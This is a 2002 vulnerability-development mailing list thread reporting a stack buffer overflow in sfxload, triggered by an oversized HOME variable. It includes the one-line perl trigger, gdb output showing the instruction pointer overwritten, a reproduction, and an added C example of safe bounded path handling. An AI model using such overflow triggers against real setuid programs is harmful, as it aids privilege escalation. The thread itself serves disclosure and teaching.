Vulnerability Development: Re: sfxload issues.

Re: sfxload issues.

From: Gabriel A. Maggiotti <gmaggiot_at_ciudad.com.ar>
Date: Thu, 3 Jan 2002 17:53:30 -0300

I successfully reproduced it on my box

<quote>
[root_at_tribilin /root]# cat /etc/issue

Red Hat Linux release 7.0 (Guinness)
Kernel 2.2.16-22 on an i586

[root_at_tribilin /root]# export HOME=`perl -e 'print "A" x 10235'`
[root_at_tribilin /root]# ./sfxload
Segmentation fault (core dumped)
</quote>

Regards,
Gabriel A. Maggiotti

Email: gmaggiot_at_ciudad.com.ar
Webpage: http://qb0x.net

----- Original Message -----
From: "l0rt" <simon_at_snosoft.com>
To: <vuln-dev_at_securityfocus.com>
Sent: Wednesday, January 02, 2002 5:53 PM
Subject: sfxload issues.

>
> Vendor : http://members.tripod.de/iwai/awedrv.html
> Program: sfxload
> OS : RH 7.1
> Version: 0.4.3
> SUID : No
> SGID : No
> Issue : This may get called by an suid helper binary which would allow
> a normal user to gain some more privs.
>
> --------------------------------------------------------------------------
>
> Details:
> [raven] /u1/cores/testing/bin> export HOME=`perl -e 'print "A" x 10235'`
>
> /* I just set HOME to be [10235] A's */
>
> [raven] /u1/cores/testing/bin> sfxload
> Segmentation fault (core dumped)
>
> /* When sfxload is run it reads in the HOME var and cores!!! */
>
> [raven] /u1/cores/testing/bin/sfxload> gdb /bin/sfxload /* gdb */
> GNU gdb 5.0rh-5 Red Hat Linux 7.1
> Copyright 2001 Free Software Foundation, Inc.
> GDB is free software, covered by the GNU General Public License, and you
> are
> welcome to change it and/or distribute copies of it under certain
> conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB. Type "show warranty" for
> details.
> This GDB was configured as "i386-redhat-linux"...(no debugging symbols
> found)...
> (gdb) core core
> Core was generated by `AAAAAAAA'.
> Program terminated with signal 11, Segmentation fault.
> Reading symbols from /lib/i686/libm.so.6...done.
> Loaded symbols for /lib/i686/libm.so.6
> Reading symbols from /lib/i686/libc.so.6...done.
> Loaded symbols for /lib/i686/libc.so.6
> Reading symbols from /lib/ld-linux.so.2...done.
> Loaded symbols for /lib/ld-linux.so.2
> #0 0x41414141 in ?? ()
> (gdb) bt
> #0 0x41414141 in ?? ()
> Cannot access memory at address 0x41414141
> (gdb)
>
> /* EIP gets killed */
>
>
>
>
> --
> Regards,
> l0rt
>
> ------------------------------------------------------------
> "The only way to get rid of temptation is to give in to it."
>
>
Received on Jan 03 2002
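The crash both posters describe, an oversized HOME value copied into a fixed-size stack buffer until it overwrites the saved return address (the `0x41414141` in the backtrace), comes from the bug class shown below beside a bounded way to build the same path from `getenv("HOME")`. This is an added example, not code from either message or from sfxload itself; the function names, the `.sfxloadrc` file name and the 256-byte buffer are assumptions, and the `make_home_run` input is constructed to mirror the `perl -e 'print "A" x 10235'` in the posts.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <limits.h>

#ifndef PATH_MAX
#define PATH_MAX 4096
#endif

#define RC_NAME ".sfxloadrc"   /* hypothetical rc-file name, an assumption */

/* Bug class behind the trace in the post: strcpy() copies until the NUL,
 * so a HOME longer than rc[] writes past the buffer into the rest of the
 * stack frame, eventually the saved return address (hence EIP=0x41414141).
 * Kept here for contrast only; nothing in this file calls it. */
static void unsafe_rc_path(const char *home, char *out)
{
    char rc[256];
    strcpy(rc, home);             /* no bound on strlen(home) */
    strcat(rc, "/" RC_NAME);
    strcpy(out, rc);
}

/* Bounded replacement. Returns 0 and fills out[0..outsz) on success, -1 if
 * HOME is missing, not absolute, longer than PATH_MAX, or the joined path
 * would not fit in out. snprintf() returns the length it wanted to write,
 * so truncation is detected instead of silently accepted. */
static int safe_rc_path(const char *home, char *out, size_t outsz)
{
    if (home == NULL || home[0] != '/')
        return -1;
    if (strlen(home) >= PATH_MAX)
        return -1;
    int n = snprintf(out, outsz, "%s/%s", home, RC_NAME);
    if (n < 0 || (size_t)n >= outsz)
        return -1;
    return 0;
}

/* Constructed input mirroring HOME=`perl -e 'print "A" x n'`, prefixed
 * with '/' so that only the length decides the outcome. Caller frees. */
static char *make_home_run(size_t n)
{
    char *s = malloc(n + 2);
    if (s == NULL)
        return NULL;
    s[0] = '/';
    memset(s + 1, 'A', n);
    s[n + 1] = '\0';
    return s;
}

/* Feed an n-'A' HOME through the bounded builder with a PATH_MAX-sized
 * output buffer: 0 accepted, -1 rejected, -2 allocation failure. */
static int result_for_run(size_t n)
{
    char out[PATH_MAX];
    char *home = make_home_run(n);
    if (home == NULL)
        return -2;
    int rc = safe_rc_path(home, out, sizeof out);
    free(home);
    return rc;
}

int main(void)
{
    char out[PATH_MAX];
    const char *home = getenv("HOME");   /* untrusted: any caller sets it */
    if (safe_rc_path(home, out, sizeof out) != 0) {
        fputs("HOME unset, relative, or too long; using defaults\n", stderr);
        return 1;
    }
    printf("rc file: %s\n", out);
    printf("10235 A's accepted? %s\n",
           result_for_run(10235) == 0 ? "yes" : "no");
    return 0;
}
```

Two rejections matter here: the explicit `PATH_MAX` check turns the 10235-byte HOME into a clean error instead of a core, and the `snprintf` return-value check catches the case where HOME alone fits but HOME plus the file name does not, which a plain length check on HOME would miss.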
